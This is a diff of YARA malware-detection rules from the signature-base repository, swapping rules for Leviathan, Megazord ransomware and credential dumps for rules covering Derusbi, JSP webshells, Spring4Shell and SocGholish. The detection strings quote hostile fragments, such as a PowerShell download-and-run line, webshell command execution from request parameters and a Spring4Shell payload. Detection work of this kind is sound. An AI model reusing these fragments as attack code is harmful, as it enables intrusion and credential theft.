-		id = "e29072d8-b4ea-5e94-8a1c-0a1baec5f423"
-		date = "2017-10-18"
+		description = "Derusbi Server Linux version"
+		author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
+		id = "2b33afb5-be87-5d41-b05e-b99d0c1d8ed9"
+		date = "2015-12-09"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/MZ7dRg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_leviathan.yar#L33-L55"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_derusbi.yar#L24-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9ebc8c2f8ddba302e0fbde69e27986236053a3d31c50cf3a2f979a9ebb90907f"
+		logic_hash = "68d5af17b33d1aa0388516e5d2a1ad29c22dc04451e232dfbdf1ef0714baeb10"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362"
 
 	strings:
-		$x1 = "a54c81.dll" fullword ascii
-		$x2 = "%d is an x64 process (can't inject x86 content)" fullword ascii
-		$x3 = "Failed to impersonate logged on user %d (%u)" fullword ascii
-		$s1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
-		$s2 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
-		$s3 = "could not run command (w/ token) because of its length of %d bytes!" fullword ascii
-		$s4 = "could not write to process memory: %d" fullword ascii
-		$s5 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
-		$s6 = "Could not connect to pipe (%s): %d" fullword ascii
+		$PS1 = "PS1=RK# \\u@\\h:\\w \\$"
+		$cmd = "unset LS_OPTIONS;uname -a"
+		$pname = "[diskio]"
+		$rkfile = "/tmp/.secure"
+		$ELF = "\x7fELF"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 3 of them )
+		$ELF at 0 and $PS1 and $cmd and $pname and $rkfile
 }
-rule SIGNATURE_BASE_Mockdll_Gen : FILE
+rule SIGNATURE_BASE_Derusbi_Kernel_Driver_WD_UDFS : FILE
 {
 	meta:
-		description = "Detects MockDll - regsvr DLL loader"
+		description = "Detects Derusbi Kernel Driver"
 		author = "Florian Roth (Nextron Systems)"
-		id = "904a0649-27e7-5024-aa6b-ddb23bba6202"
-		date = "2017-10-18"
+		id = "51d80d19-f87f-5b09-ac49-08ebcb464013"
+		date = "2015-12-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/MZ7dRg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_leviathan.yar#L57-L75"
+		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_derusbi.yar#L48-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cbe7b816199d251bfdc751f46bd95da6f0447ebd56f564619d24eb08bbd4a2c7"
-		score = 75
+		logic_hash = "bea8dafbef01ca8cf747a1f24804c0fb7868db09ce8091ff93c9c5d67d95ca3e"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bfc5c6817ff2cc4f3cd40f649e10cc9ae1e52139f35fdddbd32cb4d221368922"
-		hash2 = "80b931ab1798d7d8a8d63411861cee07e31bb9a68f595f579e11d3817cfc4aca"
+		hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
+		hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
+		hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
+		hash4 = "e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59"
 
 	strings:
-		$x1 = "mock_run_ini_Win32.dll" fullword ascii
-		$x2 = "mock_run_ini_x64.dll" fullword ascii
-		$s1 = "RealCmd=%s %s" fullword ascii
-		$s2 = "MockModule=%s" fullword ascii
+		$x1 = "\\\\.\\pipe\\usbpcex%d" fullword wide
+		$x2 = "\\\\.\\pipe\\usbpcg%d" fullword wide
+		$x3 = "\\??\\pipe\\usbpcex%d" fullword wide
+		$x4 = "\\??\\pipe\\usbpcg%d" fullword wide
+		$x5 = "$$$--Hello" fullword ascii
+		$x6 = "Wrod--$$$" fullword ascii
+		$s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" wide
+		$s2 = "Update.dll" fullword ascii
+		$s3 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" wide
+		$s4 = "\\Driver\\nsiproxy" wide
+		$s5 = "HOST: %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 2 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Vbscript_Favicon_File : FILE
+rule SIGNATURE_BASE_Derusbi_Code_Signing_Cert : FILE
 {
 	meta:
-		description = "VBScript cloaked as Favicon file used in Leviathan incident"
+		description = "Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious"
 		author = "Florian Roth (Nextron Systems)"
-		id = "84147d4e-d062-5ba4-8019-6bf4b72c36c6"
-		date = "2017-10-18"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/MZ7dRg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_leviathan.yar#L77-L96"
+		id = "d123fde9-0182-5232-a716-b76e8d9830c4"
+		date = "2015-12-15"
+		modified = "2023-12-05"
+		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_derusbi.yar#L81-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5b89ea916adf6864c8b1cb7cd7ee6d74ea47bf17a0b03cc513046f8d260ae376"
-		score = 75
+		logic_hash = "dae976a4896a4f6b6a1b415582db84f3da5aac03bf4079f75e11c790dcf23900"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		hash1 = "39c952c7e14b6be5a9cb1be3f05eafa22e1115806e927f4e2dc85d609bc0eb36"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "myxml = '<?xml version=\"\"1.0\"\" encoding=\"\"UTF-8\"\"?>';myxml = myxml +'<root>" ascii
-		$x2 = ".Run \"taskkill /im mshta.exe" ascii
-		$x3 = "<script language=\"VBScript\">Window.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 :" ascii
-		$s1 = ".ExpandEnvironmentStrings(\"%ALLUSERSPROFILE%\") &" ascii
-		$s2 = ".ExpandEnvironmentStrings(\"%temp%\") & " ascii
+		$s1 = "Fuqing Dawu Technology Co.,Ltd.0" fullword ascii
+		$s2 = "XL Games Co.,Ltd.0" fullword ascii
+		$s3 = "Wemade Entertainment co.,Ltd0" fullword ascii
 
 	condition:
-		filesize < 100KB and ( uint16( 0 ) == 0x733c and 1 of ( $x* ) ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_WIN_Megazord_Apr25 : FILE
+rule SIGNATURE_BASE_XOR_4Byte_Key : FILE
 {
 	meta:
-		description = "This Yara rule from ISH Tecnologia's Heimdall Security Research Team, detects the main components of the Megazord Ransomware"
-		author = "0x0d4y-Icaro Cesar"
-		id = "6225a690-8f54-4a50-a19a-8f7523537228"
-		date = "2025-04-11"
-		modified = "2025-04-16"
-		reference = "https://ish.com.br/wp-content/uploads/2025/04/A-Anatomia-do-Ransomware-Akira-e-sua-expansao-multiplataforma.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_win_megazord_apr25.yar#L1-L30"
+		description = "Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "77850332-87ce-5ed3-bb09-88e91e5bb5f6"
+		date = "2015-12-15"
+		modified = "2023-12-05"
+		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_derusbi.yar#L98-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fd380db23531bb7bb610a7b32fc2a6d5"
-		logic_hash = "1a73e67b9a43c4f1bbe9f3dbebeb428bbfa705f7c858909a7bbf0673951d677e"
-		score = 80
+		logic_hash = "61cbdac3fd9a486d85261234698f33aa04d505b32dfec731de6fc61d103bf609"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
-		malpedia_family = "win.akira"
 
 	strings:
-		$code_custom_algorithm = { 89 c1 45 31 e6 31 e8 44 31 f0 35 ?? ?? ?? ?? c1 c0 0b 44 31 ff 44 31 ef 31 c7 81 f7 ?? ?? ?? ?? c1 c7 0b 44 31 e3 31 cb 31 fb 81 f3 ?? ?? ?? ?? c1 c3 0b 89 da 31 c2 89 84 24 ?? ?? ?? ?? 44 31 ed 31 d5 89 94 24 ?? ?? ?? ?? 81 f5 ?? ?? ?? ?? c1 c5 0b 41 89 e8 41 31 f8 89 bc 24 ?? ?? ?? ?? 41 31 cf 45 31 c7 44 89 84 24 ?? ?? ?? ?? 41 81 f7 ?? ?? ?? ?? 41 c1 c7 0b 41 31 d4 45 31 fc 41 81 f4 ?? ?? ?? ?? 41 c1 c4 0b 45 31 c5 45 31 e5 41 81 f5 ?? ?? ?? ?? 41 c1 c5 0b 89 9c 24 ?? ?? ?? ?? 31 d9 44 31 f9 44 31 e9 81 f1 ?? ?? ?? ?? c1 c1 0b 41 89 c8 45 31 e0 44 89 a4 24 ?? ?? ?? ?? 89 ac 24 ?? ?? ?? ?? 31 e8 44 31 c0 35 ?? ?? ?? ?? c1 c0 0b 44 89 fa 44 89 bc 24 ?? ?? ?? ?? 31 fa 44 31 ea 31 c2 41 89 c1 81 f2 ?? ?? ?? ?? c1 c2 0b 41 31 d8 41 31 d0 41 81 f0 ?? ?? ?? ?? 41 c1 c0 0b 44 89 e8 44 89 ac 24 ?? ?? ?? ?? 31 e8 44 31 c8 44 31 c0 45 89 c3 35 }
-		$megazord_str_I = "powerranges" ascii
-		$megazord_str_II = "onion" ascii
-		$megazord_str_III = "powershell" ascii
-		$megazord_str_IV = "taskkill" ascii
-		$megazord_str_V = "mal_public_key_bytes" ascii
-		$megazord_str_VI = "runneradmin" ascii
-		$megazord_str_VII = "//rustc" ascii
+		$s1 = { 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $code_custom_algorithm and 5 of ( $megazord_str_* )
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them
 }
-rule SIGNATURE_BASE_CVE_2015_1701_Taihou : CVE_2015_1701 FILE
+rule SIGNATURE_BASE_Derusbi_Backdoor_Mar17_1 : FILE
 {
 	meta:
-		description = "CVE-2015-1701 compiled exploit code"
+		description = "Detects a variant of the Derusbi backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "58250e17-aa46-5451-ae6d-18fb4030f8df"
-		date = "2015-05-13"
+		id = "5c8838d6-b9c2-589e-b6a2-a8c7ad6f10cc"
+		date = "2017-03-03"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/W4nU0q"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2015_1701.yar#L2-L28"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_derusbi.yar#L123-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d230e036c303642c40bdf83be2b097f6e447a7e7d4292c495179edbae8a4124c"
-		score = 70
+		logic_hash = "068a8d5c7378c6cf9d0369374550cd34b54e9f913aa7512a6beb46395fc15b19"
+		score = 75
 		quality = 85
-		tags = "CVE-2015-1701, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "90d17ebd75ce7ff4f15b2df951572653efe2ea17"
-		hash2 = "acf181d6c2c43356e92d4ee7592700fa01e30ffb"
-		hash3 = "b8aabe12502f7d55ae332905acee80a10e3bc399"
-		hash4 = "d9989a46d590ebc792f14aa6fec30560dfe931b1"
-		hash5 = "63d1d33e7418daf200dc4660fc9a59492ddd50d9"
+		hash1 = "f87915f21dcc527981ebb6db3d332b5b341129b4af83524f59d7178e9d2a3a32"
 
 	strings:
-		$s3 = "VirtualProtect" fullword
-		$s4 = "RegisterClass"
-		$s5 = "LoadIcon"
-		$s6 = "PsLookupProcessByProcessId" fullword ascii
-		$s7 = "LoadLibraryExA" fullword ascii
-		$s8 = "gSharedInfo" fullword
-		$w1 = "user32.dll" wide
-		$w2 = "ntdll" wide
+		$x1 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
+		$x2 = "c%WINDIR%\\PCHealth\\HelpCtr\\Binaries\\pchsvc.dll" fullword wide
+		$x3 = "%Systemroot%\\Help\\perfc009.dat" fullword wide
+		$x4 = "rundll32.exe \"%s\", R32 %s" fullword wide
+		$x5 = "OfficeUt32.dll" fullword ascii
+		$x6 = "\\\\.\\pipe\\usb%so" fullword wide
+		$x7 = "\\\\.\\pipe\\usb%si" fullword wide
+		$x8 = "\\tmp1.dat" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 160KB and all of ( $s* ) and 1 of ( $w* )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
 }
-rule SIGNATURE_BASE_MAL_Wshrat_Dotnet_Packer_Feb21 : FILE
+rule SIGNATURE_BASE_WEBSHELL_JSP_Nov21_1 : FILE
 {
 	meta:
-		description = "Yara Rule for WSH rat .NET packer of February 2021 "
-		author = "Yoroi Malware ZLab"
-		id = "62e043fc-7d13-5b91-9fdd-e71d91194da2"
-		date = "2021-03-09"
+		description = "Detects JSP webshells"
+		author = "Florian Roth (Nextron Systems)"
+		id = "117eed28-c44e-5983-b4c7-b555fc06d923"
+		date = "2021-11-23"
 		modified = "2023-12-05"
-		reference = "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wsh_rat.yar#L1-L17"
+		reference = "https://www.ic3.gov/Media/News/2021/211117-2.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_spring4shell.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "18159b140c314a00111fb9453e60d19c11633628a4fe2ad8299b839165b39424"
-		score = 75
+		logic_hash = "1dac7706421961c71ba6f8d7a223b80e4b77bf206bfb64ee18c7cc894b062a3c"
+		score = 70
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$a1 = { BE DD 60 8C 34 49 9A 54 D2 40 }
-		$a2 = { 1D D7 24 22 47 A6 B1 A5 }
-		$a3 = { 13 30 03 00 07 00 00 00 01 }
-		$a4 = { 11 02 03 7D 78 00 00 04 2A }
-		$a5 = { A8 8A F4 C8 61 2B CA 07 }
-		$a6 = { 15 AE 5E AB 5A 20 FE B5 56 B4 61 2B BB 06 2A}
+		$x1 = "request.getParameter(\"pwd\")" ascii
+		$x2 = "excuteCmd(request.getParameter(" ascii
+		$x3 = "getRuntime().exec (request.getParameter(" ascii
+		$x4 = "private static final String PW = \"whoami\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them
+		filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_NTLM_Dump_Output
+rule SIGNATURE_BASE_EXPL_POC_Springcore_0Day_Indicators_Mar22_1
 {
 	meta:
-		description = "NTML Hash Dump output file - John/LC format"
+		description = "Detects indicators found after SpringCore exploitation attempts and in the POC script"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d17ee473-317b-57d4-8ea8-7c89e8f2b2ed"
-		date = "2015-10-01"
+		id = "297e4b57-f831-56e0-a391-1ffbc9a4d438"
+		date = "2022-03-30"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_dumps.yar#L17-L30"
+		reference = "https://twitter.com/vxunderground/status/1509170582469943303"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_spring4shell.yar#L19-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "154de926d27d38b38a4ed2c14b9122213fd1deb4115ef3bb77366db0818c7572"
-		score = 75
+		logic_hash = "39fb62ec7953dae0a88e39e73e3ff286fc19cb8f21f8feb869a1875f6ba70cfb"
+		score = 70
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "500:AAD3B435B51404EEAAD3B435B51404EE:" ascii
-		$s1 = "500:aad3b435b51404eeaad3b435b51404ee:" ascii
+		$x1 = "java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di"
+		$x2 = "?pwd=j&cmd=whoami"
+		$x3 = ".getParameter(%22pwd%22)"
+		$x4 = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7B"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Gsecdump_Password_Dump_File : FILE
+rule SIGNATURE_BASE_EXPL_POC_Springcore_0Day_Webshell_Mar22_1 : FILE
 {
 	meta:
-		description = "Detects a gsecdump output file"
+		description = "Detects webshell found after SpringCore exploitation attempts POC script"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c7c8ab61-f728-5eb2-a5e3-b3dd84980870"
-		date = "2018-03-06"
+		id = "e7047c98-3c60-5211-9ad5-2bfdfb35d493"
+		date = "2022-03-30"
 		modified = "2023-12-05"
-		reference = "https://t.co/OLIj1yVJ4m"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_dumps.yar#L32-L45"
+		reference = "https://twitter.com/vxunderground/status/1509170582469943303"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_spring4shell.yar#L36-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "483ad5217cbc065bd2f791c473b9a2455fddc4e0123268a8d37c64d92dd78c43"
-		score = 65
+		logic_hash = "17282b66899356a6051f0b47a7a3f02265737283d760f2256e03a2b934bb63b8"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Administrator(current):500:" ascii
+		$x1 = ".getInputStream(); int a = -1; byte[] b = new byte[2048];"
+		$x2 = "if(\"j\".equals(request.getParameter(\"pwd\")"
+		$x3 = ".getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();"
 
 	condition:
-		uint32be( 0 ) == 0x41646d69 and filesize < 3000 and $x1 at 0
+		filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_ZIP_Ntdsdit : T1003_003 FILE
+rule SIGNATURE_BASE_MAL_ZIP_Socgholish_Mar21_1 : ZIP JS SOCGHOLISH FILE
 {
 	meta:
-		description = "Detects ntds.dit files in ZIP archives that could be a left over of administrative activity or traces of data exfiltration"
-		author = "Florian Roth (Nextron Systems)"
-		id = "131ed73d-bb34-5ff6-b145-f95e4469d7f9"
-		date = "2020-08-10"
+		description = "Triggers on small zip files with typical SocGholish JS files in it"
+		author = "Nils Kuhnert"
+		id = "da35eefd-b34d-59cd-8afc-da9c78ace96e"
+		date = "2021-03-29"
 		modified = "2023-12-05"
-		reference = "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_dumps.yar#L47-L60"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_socgholish.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "371e30f50d96c884bd55ffc10d049d0ada881304746564a99dec0e8efad87602"
-		score = 50
-		quality = 85
-		tags = "T1003_003, FILE"
+		hash = "4f6566c145be5046b6be6a43c64d0acae38cada5eb49b2f73135b3ac3d6ba770"
+		hash = "54f756fbf8c20c76af7c9f538ff861690800c622d1c9db26eb3afedc50835b09"
+		hash = "dfdbec1846b74238ba3cfb8c7580c64a0fa8b14b6ed2b0e0e951cc6a9202dd8d"
+		logic_hash = "6621b029f65720e468bd167fcd7429a1f7ba8975298ddbd913b13fbe9e117df2"
+		score = 75
+		quality = 60
+		tags = "ZIP, JS, SOCGHOLISH, FILE"
 
 	strings:
-		$s1 = "ntds.dit" ascii
+		$a1 = /\.[a-z0-9]{6}\.js/ ascii
+		$a2 = "Chrome" ascii
+		$a3 = "Opera" ascii
+		$b1 = "Firefox.js" ascii
+		$b2 = "Edge.js" ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and $s1 in ( 0 .. 256 )
+		uint16( 0 ) == 0x4b50 and filesize < 1600 and ( 2 of ( $a* ) or any of ( $b* ) )
 }
-rule SIGNATURE_BASE_Bitpaymer_1
+rule SIGNATURE_BASE_EXT_MAL_JS_Socgholish_Mar21_1 : JS SOCGHOLISH FILE
 {
 	meta:
-		description = "Rule to detect newer Bitpaymer samples. Rule is based on BitPaymer custom packer"
-		author = "Morphisec labs"
-		id = "916de232-1f1b-5853-a57f-623812cfed16"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://blog.morphisec.com/bitpaymer-ransomware-with-new-custom-packer-framework"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_crime_bitpaymer.yar#L1-L12"
+		description = "Triggers on SocGholish JS files"
+		author = "Nils Kuhnert"
+		id = "3ed7d2da-569b-5851-a821-4a3cda3e13ce"
+		date = "2021-03-29"
+		modified = "2023-01-02"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_socgholish.yar#L25-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0c236794c04f0805d4611cfaf43369eeb4d0e65d6c697e6c5e6afd321fbca629"
+		hash = "7ccbdcde5a9b30f8b2b866a5ca173063dec7bc92034e7cf10e3eebff017f3c23"
+		hash = "f6d738baea6802cbbb3ae63b39bf65fbd641a1f0d2f0c819a8c56f677b97bed1"
+		hash = "c7372ffaf831ad963c0a9348beeaadb5e814ceeb878a0cc7709473343d63a51c"
+		logic_hash = "08218ae952577a6ac936de875236cdc3ae32e3aaccd2196b7f43e80d7e748584"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "JS, SOCGHOLISH, FILE"
 
 	strings:
-		$opcodes1 = {B9 ?? 00 00 00 FF 14 0F B8 FF 00 00 00 C3 89 45 FC}
-		$opcodes2 = {61 55 FF 54 B7 01 B0 FF C9 C3 CC 89 45 FC}
+		$s1 = "new ActiveXObject('Scripting.FileSystemObject');" ascii
+		$s2 = "['DeleteFile']" ascii
+		$s3 = "['WScript']['ScriptFullName']" ascii
+		$s4 = "['WScript']['Sleep'](1000)" ascii
+		$s5 = "new ActiveXObject('MSXML2.XMLHTTP')" ascii
+		$s6 = "this['eval']" ascii
+		$s7 = "String['fromCharCode']"
+		$s8 = "2), 16)," ascii
+		$s9 = "= 103," ascii
+		$s10 = "'00000000'" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d ) and ( $opcodes1 or $opcodes2 )
+		filesize > 3KB and filesize < 5KB and 8 of ( $s* )
 }
-rule SIGNATURE_BASE_APT_MAL_DTRACK_Oct19_1 : FILE
+rule SIGNATURE_BASE_Socgholish_JS_22_02_2022 : FILE
 {
 	meta:
-		description = "Detects DTRACK malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "802135bd-234d-574d-b111-fcc9eaa000f8"
-		date = "2019-10-28"
+		description = "Detects SocGholish fake update Javascript files 22.02.2022"
+		author = "Wojciech Cieślak"
+		id = "68d2dbb7-0079-527a-92c7-450c3dd953b3"
+		date = "2022-02-22"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/a_tweeter_user/status/1188811977851887616?s=21"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_dtrack.yar#L2-L44"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_socgholish.yar#L53-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b99bc8ec4df7185da306365dc2a24a0849ff0d5d92269daaa1efbb20f5e5bf83"
+		hash = "3e14d04da9cc38f371961f6115f37c30"
+		hash = "dffa20158dcc110366f939bd137515c3"
+		hash = "afee3af324951b1840c789540d5c8bff"
+		hash = "c04a1625efec27fb6bbef9c66ca8372b"
+		hash = "d08a2350df5abbd8fd530cff8339373e"
+		logic_hash = "fd529cbb511ff6bcf37b44b835e021b28763922f7726ff67db5cbb3f9193c7ae"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c5c1ca4382f397481174914b1931e851a9c61f029e6b3eb8a65c9e92ddf7aa4c"
-		hash2 = "a0664ac662802905329ec6ab3b3ae843f191e6555b707f305f8f5a0599ca3f68"
-		hash3 = "93a01fbbdd63943c151679d037d32b1d82a55d66c6cb93c40ff63f2b770e5ca9"
-		hash4 = "3cc9d9a12f3b884582e5c4daf7d83c4a510172a836de90b87439388e3cde3682"
-		hash5 = "bfb39f486372a509f307cde3361795a2f9f759cbeb4cac07562dcbaebc070364"
-		hash6 = "58fef66f346fe3ed320e22640ab997055e54c8704fc272392d71e367e2d1c2bb"
-		hash7 = "9d9571b93218f9a635cfeb67b3b31e211be062fd0593c0756eb06a1f58e187fd"
 
 	strings:
-		$xc1 = { 25 73 2A 2E 2A 00 00 00 5C 00 00 00 25 73 7E 00
-               5C 00 00 00 77 62 00 00 64 61 74 00 64 6B 77 65
-               72 6F 33 38 6F 65 72 41 5E 74 40 23 00 00 00 00
-               63 3A 5C 00 25 73 5C 25 63 2E 74 6D 70 }
-		$sx1 = "%02d.%02d.%04d - %02d:%02d:%02d:%03d : " fullword ascii
-		$sx2 = "%s\\%c.tmp" fullword ascii
-		$sx3 = "dkwero38oerA" fullword ascii
-		$sx4 = "awz2qr21yfbj" fullword ascii
-		$s1 = "Execute_%s.log" ascii
-		$s2 = "%s\\%s\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" fullword ascii
-		$s3 = "CCS_Mozilla/5.0" fullword ascii
-		$s4 = "\\C$\\Windows\\Temp\\MpLogs\\" ascii
-		$s5 = "127.0.0.1 >NUL & echo EEEE > \"%s\"" fullword ascii
-		$s6 = "[+] DownloadCommand" fullword ascii
-		$s7 = "DC-Error: Too long cmd length" fullword ascii
-		$s8 = "%s\\~%d.tmp" fullword ascii
-		$s9 = "%02X:%02X:%02X:%02X:%02X:%02X" ascii fullword
-		$op1 = { 0f b6 8d a3 fc ff ff 85 c9 74 09 8b 55 f4 83 c2 }
-		$op2 = { 6a 00 8d 85 28 fc ff ff 50 6a 04 8d 4d f8 51 8b }
-		$op3 = { 8b 85 c8 fd ff ff 03 85 a4 fc ff ff 89 85 b4 fc }
+		$s1 = "encodeURIComponent(''+" ascii
+		$s2 = "['open']('POST'," ascii
